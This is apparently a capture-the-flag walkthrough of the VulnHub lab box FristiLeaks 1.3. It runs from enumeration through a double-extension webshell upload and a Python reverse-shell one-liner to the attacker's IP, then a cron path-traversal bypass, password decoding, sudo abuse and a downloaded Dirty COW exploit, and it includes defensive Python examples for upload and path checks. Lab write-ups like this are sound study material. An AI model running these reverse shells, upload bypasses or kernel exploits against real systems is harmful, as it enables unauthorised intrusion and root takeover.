【攻略鴨】FristiLeaks 1.3 VulnHub Box Walkthrough

The content of this article is purely fictional. Please follow, like and support 攻略鴨 on Bilibili!
Attack box address: 192.168.31.196
As the box description requires, set the VM's MAC address to 08:00:27:A5:A6:76; after boot the target's address is 192.168.31.123
(To set the VM's MAC address: VM settings -> Network adapter -> Advanced -> MAC address)
External information gathering
Port scan
Nmap results:
80/tcp open  Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
robots.txt: /cola /sisi /beer
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
Port 80
Nothing sensitive in the page source
After opening the three directories, their page source contains only the path /images/3037440.jpg
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.123/FUZZ
Nothing found
Exploitation
Steganographic information leak
From other people's blogs I found that /fristi/ has a login form
A comment in the page source reveals the username eezeepz together with a base64-encoded PNG image.
Decoding the base64 image yields the string keKkeKKeKKeKkEkkEk
Testing the login form:
http://192.168.31.123/fristi/checklogin.php
POST /fristi/checklogin.php HTTP/1.1
myusername=test1&mypassword=test2&Submit=Login
Response:
Wrong Username or Password
No failed-login handling was observed; an attempt at username enumeration failed
Logging in as eezeepz:keKkeKKeKKeKkEkkEk succeeded, and an image upload feature was found.
File upload
After submitting a normal image, white-wolf-wizard.jpg, the response says the file was submitted to /uploads
Trying http://192.168.31.123/fristi/uploads/ returns "no"
white-wolf-wizard.jpg can be accessed directly
Uploading a Behinder (冰蝎) webshell is rejected with a message that only png, jpg and gif are allowed
Since the server's middleware version (Apache 2.2.15 / PHP 5.3.3) is known, I tried uploading shell.php.jpg, which succeeded: http://192.168.31.123/fristi/uploads/shell.php.jpg
>id
uid=48(apache) gid=48(apache) groups=48(apache)
On the attack box run nc -nvlp 443, then execute the following through the Behinder command shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.196",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Success
python -c 'import pty;pty.spawn("/bin/bash")'
echo $-
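As an added example (not code from the original write-up or from the box), a Python sketch of an upload filter that only inspects the final extension, which is why shell.php.jpg got through, beside a hardened version that rejects handler extensions anywhere in the name, verifies the image magic bytes, and stores the file under a server-chosen name. The handler-extension list and the stored-name scheme are assumptions.

```python
import hashlib

# Magic bytes of the three formats the box's upload form accepts.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Extensions Apache 2.2 + mod_php can map to the PHP handler wherever they
# appear in a multi-extension name, so "shell.php.jpg" still runs as PHP
# (assumed list; adjust to the server's AddHandler/AddType configuration).
HANDLER_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phps"}


def last_extension_check(filename):
    """The weak check: only the final extension is inspected."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def all_extensions_check(filename):
    """Reject a handler extension anywhere in the name, not only at the end."""
    parts = filename.lower().split(".")[1:]
    if not parts or parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(p in HANDLER_EXTENSIONS for p in parts)


def detect_image_type(data):
    """Return 'png', 'jpg' or 'gif' from the leading bytes, else None."""
    for kind, signatures in IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def stored_name(filename, data):
    """Hardened handling: validate every extension, verify the content's magic
    bytes, then store under a server-chosen name (content hash plus a single
    image extension). A valid image header can still have PHP appended after
    it, so never letting the client-supplied name reach disk is what actually
    keeps the upload out of the PHP handler."""
    if not all_extensions_check(filename) or detect_image_type(data) is None:
        return None
    return hashlib.sha256(data).hexdigest()[:16] + "." + detect_image_type(data)
```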
Privilege escalation
Information gathering as the apache user
cat /etc/passwd
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin
OS: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org)
(gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
gcc.x86_64    4.4.7-16.el6
Checking scheduled tasks:
ls -al /etc/cron*
/etc/cron.d/0hourly:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly
/etc/cron.hourly/0anacron:
cat /etc/cron.hourly/0anacron
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
    exit 0;
fi
# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power &> /dev/null
    if test $? -eq 1; then
    exit 0
    fi
fi
/usr/sbin/anacron -s
ls -al /usr/sbin/anacron
-rwxr-xr-x. 1 root root 38968 Nov 10  2015 /usr/sbin/anacron
/var/spool/anacron:
-rw-------. 1 root root    9 Dec  5 05:22 cron.daily
-rw-------. 1 root root    9 Dec  5 06:02 cron.monthly
-rw-------. 1 root root    9 Dec  5 05:42 cron.weekly
No content
ls -al /var/spool/cron
-rw-------  1 admin    admin   49 Nov 18  2015 admin
No permission
Sudo version 1.8.6p3
SELinux status: disabled
mysql  Ver 14.14 Distrib 5.1.73
Database:
cat /var/www/html/fristi/checklogin.php
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name
mysql -h localhost -u eezeepz -p 4ll3maal12
Login failed
Checking mail
ls -al /var/mail/
ls -al /var/spool/mail/
No permission, and all files are size 0
cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
In /home/eezeepz:
ls -al
...
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18  2015 notes.txt
...
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
Note that a runthis file created under /tmp/ is run as the admin user
SUID privilege escalation
Attempts:
echo "chmod -R 777 /home/admin" >/tmp/runthis: not executed
echo "/bin/chmod -R 477 /home/admin" >/tmp/runthis: not executed
Returned: command did not start with /home/admin or /usr/bin
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" >/tmp/runthis: executed
(there is no chmod under /usr/bin/, but the check only looks at the start of the string, so a path that begins with /usr/bin and climbs out with .. is accepted)
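As an added example (not the box's cronjob.py, whose source is not shown here), a Python comparison of the string-prefix check that the error message implies with a canonicalising check that would have rejected the /usr/bin/../../bin/chmod line; the sample runthis contents are constructed from the commands above.

```python
import os

# Constructed sample "runthis" file, one command per line as Jerry's note
# describes. Lines 3 and 4 are the two chmod attempts from the walkthrough.
SAMPLE_RUNTHIS = """\
/usr/bin/id
/home/admin/cat /home/admin/cryptedpass.txt
/usr/bin/../../bin/chmod -R 777 /home/admin
/bin/chmod -R 477 /home/admin
"""

ALLOWED_DIRS = ("/home/admin", "/usr/bin")


def prefix_check(command):
    """The check the cron job's error message implies: a plain string-prefix
    test on the raw path. '/usr/bin/../../bin/chmod' starts with '/usr/bin'
    and is accepted even though it resolves to /bin/chmod."""
    binary = command.split()[0]
    return binary.startswith(ALLOWED_DIRS)


def canonical_check(command, resolve=os.path.normpath):
    """Hardened check (an assumption, not the box's cronjob.py): normalise the
    path so '..' segments collapse, then require the binary to sit directly in
    an allowed directory. Comparing the directory instead of a string prefix
    also stops names like '/home/admin2/...' from matching. normpath is the
    default so the result does not depend on the host's symlinks; a deployed
    version should pass os.path.realpath to resolve symlinks as well."""
    binary = command.split()[0]
    return os.path.dirname(resolve(binary)) in ALLOWED_DIRS


def runnable_lines(text, check):
    """Commands a cron job using `check` would execute from a runthis file."""
    return [line for line in text.splitlines() if line.strip() and check(line)]
```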
Finding files owned by admin
find / -user admin 2>/dev/null
/home/admin
/home/admin/df
/home/admin/cat
/home/admin/chmod
/home/admin/cryptedpass.txt
/home/admin/.bash_logout
/home/admin/.bashrc
/home/admin/echo
/home/admin/egrep
/home/admin/ps
/home/admin/cryptpass.py
/home/admin/.bash_profile
/home/admin/grep
/home/admin/cronjob.py
/var/spool/mail/admin
/tmp/cronresult
cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
cryptpass.py
import base64,codecs,sys

# Encoding routine as found in /home/admin/cryptpass.py (Python 2 syntax):
# base64-encode, reverse the string, then rot13 the result.
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
So: base64 encode first, then reverse the string, then rot13.
Rewritten as a decryption script, decryptpass.py (rot13 is its own inverse, so applying it again to the reversed ciphertext restores the base64 text):
import base64, codecs

def decodeString(s):
    # Undo the three steps in reverse order: reverse, rot13, base64-decode
    # (reversal and rot13 commute, since rot13 works per character)
    rot13string = codecs.encode(s[::-1], 'rot13')
    explicit = base64.b64decode(rot13string)
    return explicit

cryptedpass = 'mVGZ3O3omkJLmy2pcuTq'
whoisyourgodnow = '=RFn0AKnlMHMPIzpyuTI0ITG'
print("cryptedpass: ", str(decodeString(cryptedpass), encoding='utf-8'))
print("whoisyourgodnow: ", str(decodeString(whoisyourgodnow), encoding='utf-8'))
$ python decryptpass.py
cryptedpass:  thisisalsopw123
whoisyourgodnow:  LetThereBeFristi!
su fristigod
Password: LetThereBeFristi!
From the passwd file: fristigod:x:502:502::/var/fristigod:/bin/bash
cd /var/fristigod
ls -al
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
This shows that root commands can be run through sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
cd .secret_admin_stuff
ls -al
**-rwsr-sr-x**  1 root      root      7529 Nov 25  2015 doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Kernel privilege escalation
Attack box:
$ cp /usr/share/exploitdb/exploits/linux/local/40839.c .
$ python -m http.server 8080
Target:
cd /tmp
wget 192.168.31.196:8080/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456qaz
Result:
firefart:fire86WDPZnrM:0:0:pwned:/root:/bin/bash
mmap: 7ff3e25bd000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456qaz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
$ su firefart
Password: 123456qaz
# id
uid=0(firefart) gid=0(root) groups=0(root)
Other
cat /var/spool/cron
* * * * * /usr/bin/python /home/admin/cronjob.py
cat /etc/sudoers
fristigod ALL=(fristi:ALL) /var/fristigod/.secret_admin_stuff/doCom
# cat /root/fristileaks_secrets.txt
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
I did not guess the fristi directory; at the time I could not translate the word, and later looked it up: it is the name of a drink.
Reproduction without the author's permission is prohibited!